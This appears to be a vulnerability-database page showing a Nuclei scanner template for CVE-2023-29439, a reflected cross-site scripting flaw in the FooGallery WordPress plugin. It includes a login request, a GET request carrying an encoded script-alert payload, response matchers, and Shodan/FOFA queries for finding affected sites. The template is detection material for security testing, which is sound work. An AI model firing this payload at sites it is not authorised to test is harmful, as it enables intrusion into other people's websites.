Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-29439
HistoryOct 17, 2023 - 7:20 a.m.

FooGallery plugin <= 2.2.35 - Cross-Site Scripting

2023-10-1707:20:28
ProjectDiscovery
github.com
5
cve
xss
wordpress
foogallery
authenticated
fooplugins
wp-plugin

CVSS3

7.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

LOW

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

EPSS

0.002

Percentile

61.3%

Reflected Cross-Site Scripting (XSS) vulnerability in FooPlugins FooGallery plugin &lt;= 2.2.35 versions.
id: CVE-2023-29439

info:
  name: FooGallery plugin <= 2.2.35 - Cross-Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    Reflected Cross-Site Scripting (XSS) vulnerability in FooPlugins FooGallery plugin <= 2.2.35 versions.
  reference:
    - https://lourcode.kr/posts/CVE-2023-29439-Analysis?_s_id=cve
    - https://wordpress.org/plugins/foogallery/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-29439
    - https://patchstack.com/database/vulnerability/foogallery/wordpress-foogallery-plugin-2-2-35-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-29439
    cwe-id: CWE-79
    epss-score: 0.00161
    epss-percentile: 0.52668
    cpe: cpe:2.3:a:fooplugins:foogallery:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: "true"
    max-request: 2
    vendor: fooplugins
    product: foogallery
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/foogallery/
    fofa-query: body=/wp-content/plugins/foogallery/
    publicwww-query: "/wp-content/plugins/foogallery/"
  tags: cve,cve2023,xss,wordpress,wp-plugin,wp,foogallery,authenticated,fooplugins

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/post-new.php?post_type=foogallery&post=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'data-gallery_id="\"><script>alert(document.domain)</script>"'
          - 'foogallery-image-edit-modal'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502203a35033a9084161b8e269f87a994abd179878f15d72253d472fb749ac232026b022100efc52768b3bbb3b843a30408c2efa8845dd476bfb311d1d56ca5b5899f15218a:922c64590222798bb761d5b6d8e72950

CVSS3

7.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

LOW

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

EPSS

0.002

Percentile

61.3%

Related for NUCLEI:CVE-2023-29439